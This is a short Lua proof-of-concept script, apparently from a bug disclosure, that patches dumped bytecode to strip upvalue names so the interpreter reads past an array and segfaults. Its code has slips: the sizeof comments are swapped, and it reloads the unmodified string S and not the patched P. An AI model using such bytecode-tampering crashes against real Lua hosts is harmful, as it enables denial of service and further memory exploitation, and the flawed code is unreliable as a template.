-- Configure these parameters for your environmentsizeof_int = 4 -- sizeof(

1. -- Configure these parameters for your environment
2. sizeof_int = 4    -- sizeof(size_t) in C
3. sizeof_size_t = 4 -- sizeof(int) in C
4. endian = "small"  -- "small" or "big"
5.  
6. -- do ... end block so that the locals are used if this is typed line by line into the interpreter
7. do
8.   -- define some locals to be used as upvalues
9.   local a, b, c
10.   -- define a function using upvalues
11.   function F()
12.     -- Make sure that upvalues #1 through #2 refer to a, b and c (in that order)
13.     local _ = {a, b, c}
14.     -- This line will generate an error referring to upvalue #3
15.     return c[b][a]
16.   end
17. end
18.  
19. -- Convert function F to it's binary form
20. -- (the values of the upvalues are not dumped)
21. S = string.dump(F)
22.  
23. -- Remove the upvalue names of upvalues #2 and #3 from the debug information
24. if endian == "small" then
25.   -- We need at-least one upvalue name, or else the upvalue name array will be of zero length
26.   -- and thus be NULL (lua allocator must return NULL when nsize == 0). Thus reduce the upvalue
27.   -- name array to a single entry.
28.   P = S:gsub("\3".. ("%z"):rep(sizeof_int - 1) ..           -- Number of upvalue names (3)
29.              "\2".. ("%z"):rep(sizeof_size_t - 1) ..".%z".. -- Name of upvalue #1 (length 2, "a\0")
30.              "\2".. ("%z"):rep(sizeof_size_t - 1) ..".%z"   -- Name of upvalue #2 (length 2, "b\0")
31.              ,
32.              "\1".. ("\0"):rep(sizeof_int - 1)              -- Number of upvalue names (1)
33.             )
34. else
35.   -- Same as previous code, but for big-endian integers
36.   P = S:gsub(("%z"):rep(sizeof_int - 1) .."\3"..
37.              ("%z"):rep(sizeof_size_t - 1) .."\2.%z"..
38.              ("%z"):rep(sizeof_size_t - 1) .."\2.%z"
39.              ,
40.              ("\0"):rep(sizeof_int - 1) .. "\1"
41.             )
42. end
43.  
44. -- Load the modified binary
45. M = assert(loadstring(S))
46.  
47. -- Execute the modified function
48. -- This should cause the error "attempt to index upvalue 'c' (a nil value)"
49. -- However, as the name of upvalue #3 is no longer in the upvalue name array, when the VM goes to generate
50. -- the error message, it references past the end of the upvalue name array, leading to a segfault
51. M()
52.